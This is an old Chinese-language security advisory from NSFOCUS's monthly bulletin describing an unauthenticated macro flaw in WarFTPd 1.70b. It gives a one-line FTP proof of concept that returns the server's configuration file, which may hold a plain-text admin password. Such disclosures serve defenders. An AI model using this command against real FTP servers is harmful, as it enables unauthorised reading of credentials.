首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第5期->最新漏洞
主页:http://www.nsfocus.com/
日期:1999-12-14
发布日期: 2000-1-7
更新日期: 2000-1-7
受影响的系统:
Jgaa WarFTPd 1.70b
+Windows NT/95/98
--------------------------------------------------------------------------------
描述:
WarFTPd包含很多宏用来帮助进行一个复杂的ftp站点的设置.
然而,即使是一个未经认证的用户也可以远程调用这些宏,有些宏能泄漏服务器和操作系统
的信息,也能被用来在返回的错误信息中获取文件内容,甚至包括WarFTP的配置文件,里面可
能包含纯文本方式保存的管理员口令.
--------------------------------------------------------------------------------
测试程序:
警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ftp连接到目标主机,执行"literal [warsvr.conf]"
得到结果:
500 '[Options]
core_RESNAME=WARSVR
core_RPCPORT=0
core_PRIORITY=2
core_TRAYICON=1
core_WM_CLOSE=1
log_LOGFILE=Log/%Y-%m-%d.log
... etc
': command not understood.
--------------------------------------------------------------------------------
建议: 暂无
版权所有,未经许可,不得转载